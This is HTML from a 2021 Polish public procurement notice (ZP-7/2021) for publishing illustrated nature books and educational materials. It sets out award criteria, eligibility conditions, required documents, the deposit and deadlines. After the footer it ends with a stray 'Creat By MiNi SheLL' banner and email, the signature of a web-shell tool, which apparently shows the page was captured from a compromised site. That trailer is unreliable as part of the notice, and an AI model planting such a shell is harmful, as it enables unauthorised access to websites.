najkorzystniejszą zostanie uznana oferta z najwyższą punktacją za kryteriaokreślone w pkt. 16.1. a) i b) – cena oraz jakość wykonania i walory estetyczne.<br/>16.3. W sytuacji, gdy Zamawiający nie będzie mógł dokonać wyboru <br/>najkorzystniejszej oferty ze względu na to, że zostały złożone oferty o takiej <br/>samej cenie, wezwie on Wykonawców, którzy złożyli te oferty, do złożenia w <br/>terminie określonym przez Zamawiającego ofert dodatkowych zawierających <br/>nową cenę. Wykonawcy, składając oferty dodatkowe, nie mogą zaoferować cen <br/>wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach.<br/>16.4. W toku badania i oceny ofert Zamawiający może żądać od Wykonawców <br/>wyjaśnień dotyczących treści złożonych przez nich ofert lub innych składanych <br/>dokumentów lub oświadczeń. Wykonawcy są zobowiązani do przedstawienia <br/>wyjaśnień w terminie wskazanym przez Zamawiającego.<br/>16.5. Zamawiający wybiera najkorzystniejszą ofertę w terminie związania ofertą<br/>określonym w SWZ. <br/>16.6. Jeżeli termin związania ofertą upłynie przed wyborem najkorzystniejszej oferty, Zamawiający wezwie Wykonawcę, którego oferta otrzymała najwyższą ocenę do wyrażenia, w wyznaczonym przez Zamawiającego terminie, pisemnej zgody na wybór jego oferty.<br/>16.7. W przypadku braku zgody, o której mowa w ust. 16.6., oferta podlega <br/>odrzuceniu, a Zamawiający zwraca się o wyrażenie takiej zgody do kolejnego <br/>Wykonawcy, którego oferta została najwyżej oceniona, chyba ze zachodzą <br/>przesłanki do unieważnienia postępowania.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Jakość wykonania i walory estetyczne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 19.1. W postępowaniu mogą brać udział Wykonawcy, którzy spełniają warunki <br/>udziału w postępowaniu, o których mowa w art. 112 ust. 2 PZP dotyczące:<br/>1) zdolności technicznej lub zawodowej.<br/>a) Warunek ten, w zakresie doświadczenia, zostanie uznany za spełniony, jeśli <br/>Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu <br/>składania ofert (a jeżeli okres prowadzenia działalności jest krótszy – w tym <br/>okresie) zrealizował lub realizuje (przy czym w tym przypadku będzie liczona <br/>wartość zrealizowanej części przedmiotu umowy) co najmniej 4 barwnych, <br/>bogato ilustrowanych kolorowymi fotografiami publikacji o charakterze <br/>przyrodniczym, w skład których wchodzą m.in.:<br/>- przynajmniej 2 pozycje książkowe popularne lub popularno-naukowe w <br/>twardej oprawie, o objętości co najmniej 100 stron i formacie nie mniejszym <br/>niż B-5<br/>- co najmniej 2 materiały edukacyjne o charakterze przyrodniczym w postaci <br/>zestawu barwnie ilustrowanych fotografiami kart pracy, plansz edukacyjnych, <br/>plakatów, zeszytów ćwiczeń itp.<br/>Kwota jednej z publikacji powinna mieć wartość nie mniejszą niż 40 000 zł <br/>brutto;<br/>b) Warunek ten, w zakresie osób skierowanych przez wykonawcę do realizacji <br/>zamówienia, zostanie uznany za spełniony, jeśli Wykonawca wykaże, że <br/>dysponuje lub będzie dysponować:<br/>- osobą grafika komputerowego z co najmniej 5-letnim doświadczeniem w <br/>zawodzie <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) aktualne na dzień składania ofert oświadczenie Wykonawcy stanowiące <br/>wstępne potwierdzenie spełnienia warunków udziału w postępowaniu <br/>określonych w SWZ i braku podstaw do wykluczenia. (załącznik nr 3 do <br/>SWZ ZP-7/2021)<br/>2) oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy o <br/>braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy <br/>z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz.U. z <br/>2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną <br/>ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w <br/>postępowaniu, albo oświadczenia o przynależności do tej samej grupy <br/>kapitałowej wraz z dokumentami lub informacjami potwierdzającymi <br/>przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do <br/>udziału w postępowaniu niezależnie od innego wykonawcy należącego do <br/>tej samej grupy kapitałowej (załącznik nr 5 do SWZ ZP-7/2021);<br/>5) informacji z Krajowego Rejestru Karnego w zakresie:<br/>a) art. 108 ust. 1 pkt 1 i 2 ustawy z dnia 11 września 2019 r. - Prawo <br/>zamówień publicznych, zwanej dalej „ustawą”,<br/>b) art. 108 ust. 1 pkt 4 ustawy, dotyczącej orzeczenia zakazu ubiegania się <br/>o zamówienie publiczne tytułem środka karnego,<br/>c) art. 109 ust. 1 pkt 2 lit. a ustawy,<br/>d) art. 109 ust. 1 pkt 2 lit. b ustawy, dotyczącej ukarania za wykroczenie, <br/>za które wymierzono karę aresztu,<br/>e) art. 109 ust. 1 pkt 3 ustawy, dotyczącej skazania za przestępstwo lub <br/>ukarania za wykroczenie, za które wymierzono karę aresztu<br/>-sporządzonej nie wcześniej niż 6 miesięcy przed jej złożeniem;<br/>6) odpis lub informacje z Krajowego Rejestru Sądowego lub z <br/>Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w <br/>zakresie art. 109 ust. 1 pkt 4) PZP, sporządzonych nie wcześniej niż 3 <br/>miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do <br/>rejestru lub ewidencji</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">20.1. W celu potwierdzenia braku podstaw do wykluczenia z postępowania, o <br/>których mowa w rozdziale 14 pkt. 14.1 i 14.2 oraz w celu potwierdzenia <br/>spełniania warunków udziału w postępowaniu, o których mowa w rozdziale <br/>19 pkt. 19.1. Wykonawca będzie obowiązany przedstawić Zamawiającemu <br/>następujące oświadczenia i dokumenty, które składa wraz z ofertą:<br/>3) wykazu usług wykonanych, a w przypadku świadczeń powtarzających się <br/>lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli <br/>okres prowadzenia działalności jest krótszy - w tym okresie, wraz z <br/>podaniem ich wartości (brutto), przedmiotu, dat wykonania i podmiotów, <br/>na rzecz których usługi zostały wykonane lub są wykonywane, oraz <br/>załączeniem dowodów określających, czy te usługi zostały wykonane lub <br/>są wykonywane należycie, przy czym dowodami, o których mowa, są <br/>referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń <br/>powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z <br/>przyczyn niezależnych od niego nie jest w stanie uzyskać tych <br/>dokumentów - oświadczenie wykonawcy; w przypadku świadczeń <br/>powtarzających się lub ciągłych nadal wykonywanych referencje bądź <br/>inne dokumenty potwierdzające ich należyte wykonywanie powinny być <br/>wystawione w okresie ostatnich 3 miesięcy (załącznik nr 6 do SWZ ZP7/2021);<br/>4) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia <br/>publicznego, w szczególności odpowiedzialnych za świadczenie usług, <br/>wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, <br/>doświadczenia i wykształcenia niezbędnych do wykonania zamówienia <br/>publicznego, a także zakresu wykonywanych przez nie czynności oraz <br/>informacją o podstawie do dysponowania tymi osobami (załącznik nr 7 <br/>do SWZ ZP-7/2021);</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> próbka, w rozumieniu art. 107 ust. 3., która będzie podlegała ocenie (kryterium jakość<br/>wykonania i walory estetyczne) <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 25.1. Zamawiający wymaga wniesienia wadium w wysokości: 500,00 zł<br/>25.2. Wadium należy wnieść przed upływem terminu składania ofert.<br/>25.3. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>- pieniądzu,<br/>- gwarancjach bankowych,<br/>- gwarancjach ubezpieczeniowych,<br/>- poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 <br/>pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju <br/>Przedsiębiorczości (tekst jedn.: Dz. U. z 2019 r. poz. 310,836,1572 z późn. zm.).<br/>25.4. Wadium wpłacane w pieniądzu należy wnieść przelewem na rachunek <br/>bankowy Zamawiającego w Banku Gospodarstwa Krajowego Oddział w <br/>Krakowie nr rachunku: 46 1130 1150 0012 1252 7890 0001 z dopiskiem: <br/>„wadium na zabezpieczenie oferty w postępowaniu ZP-7/2021.”<br/>Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie <br/>zostanie zaliczone na rachunku bankowym Zamawiającego. Dowód wniesienia <br/>wadium w formie innej niż pieniężnej należy załączyć do oferty. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 19.3. Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców <br/>wspólnie ubiegających się o zamówienie. Przy ocenie spełniania warunków <br/>przez Wykonawców wspólnie składających ofertę Zamawiający przyjmie, że <br/>warunki udziału określone w pkt 14.1. powinni spełniać łącznie wszyscy <br/>Wykonawcy. Żaden z Wykonawców wspólnie ubiegających się o udzielenie <br/>zamówienia nie może podlegać wykluczeniu z postępowania.<br/>19.4. W odniesieniu do warunków dotyczących kwalifikacji zawodowych lub <br/>doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia <br/>mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają usługi, <br/>do realizacji których te zdolności są wymagane. W takim przypadku, <br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do <br/>oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni <br/>Wykonawcy.<br/>20.2. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców <br/>oświadczenie o którym mowa w pkt 20.1.1) powyżej składa każdy z <br/>Wykonawców wspólnie ubiegających się o zamówienie. Dokumenty te <br/>potwierdzają spełnianie warunków udziału w postępowaniu oraz brak podstaw SWZ ZP-7/2021 „Wydanie kompletu publikacji w ramach realizacji <br/>indywidualnego polsko-słowackiego mikroprojektu: „ Z kamerą wśród zwierząt ” <br/>(INT/EB/BES/1/VI/A/0225)”.<br/>wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie <br/>warunków udziału w postępowaniu oraz brak podstaw wykluczenia.<br/>20.3. Wykonawca, który powołuje się na zasoby innych podmiotów, w celu <br/>wykazania braku istnienia wobec nich podstaw do wykluczenia oraz spełniania, <br/>w zakresie w jakim powołuje się na ich zasoby, warunków udziału w <br/>postępowaniu, zamieszcza informację o tych podmiotach w oświadczeniu o <br/>którym mowa w pkt 20.1.1).<br/>20.4. Wykonawca, który zamierza powierzyć wykonanie części zamówienia <br/>podwykonawcom, w celu wykazania braku istnienia wobec nich podstaw do <br/>wykluczenia z udziału w postępowaniu zamieścić ma informację o <br/>podwykonawcach w oświadczeniu o którym mowa w pkt 20.1.1)<br/>17.5. Przed podpisaniem umowy Wykonawcy wspólnie ubiegający się o udzielenie <br/>zamówienia (w przypadku wyboru ich oferty jako najkorzystniejszej) <br/>przedstawią Zamawiającemu umowę regulującą współpracę tych <br/>Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> § 8<br/>Zmiany umowy<br/>1.	Zmiany i uzupełnienia treści umowy mogą być dokonane wyłącznie pod rygorem nieważności w formie aneksu podpisanego przez obie strony.<br/>2. Zamawiający dopuszcza zmianę umowy w formie aneksu, jeżeli zajdzie potrzeba w sytuacji zmiany obowiązujących przepisów, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-08 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-08 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-05-27 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com